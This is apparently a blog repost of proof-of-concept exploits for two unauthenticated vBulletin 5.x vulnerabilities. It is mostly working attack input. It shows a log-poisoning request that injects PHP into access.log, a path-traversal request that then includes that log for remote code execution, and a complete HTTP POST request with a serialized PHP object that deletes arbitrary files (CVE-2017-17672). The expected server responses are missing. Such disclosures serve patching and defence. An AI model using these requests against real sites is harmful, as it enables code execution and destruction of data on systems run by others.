[PoC] Two critical vulnerabilities exist on vBulletin 5x

Recently, the security researcher from securiteam published the vulnerabilities details that affect to vBulletin 5x. Although, they tried to contact to vBulletin developer to fix but have no any answers. It means all website that is using vBulletin 5x is vulnerable.

vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage

  1. vBulletin routestring Unauthenticated Remote Code Execution 

    Proof of Concept
    We can check if the server is vulnerable by sending the following GET request:/index.php?routestring=.\\

    If the response is:

    The server is vulnerable.

    If we want to inject a php code to any file on the server we can use the access.log for example:

    /?LogINJ_START=<?php phpinfo();?>LogINJ_END

    After that we can include access.log with our PHP code:

    /index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log

     

    You can read the vulnerability analysis here.

  2. CVE-2017-17672 vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion

    Proof of Concept
    By sending the following POST request an unauthenticated attacker can delete files from the victims server

    POST /vb533/ajax/api/template/cacheTemplates HTTP/1.1
    Host: vb533.test
    Pragma: no-cache
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/61.0.3163.100 Safari/537.36
    Upgrade-Insecure-Requests: 1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 125

    templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:13:"/path/to/file";}

    The server then will respond with:

    You can read the vulnerability analysis here.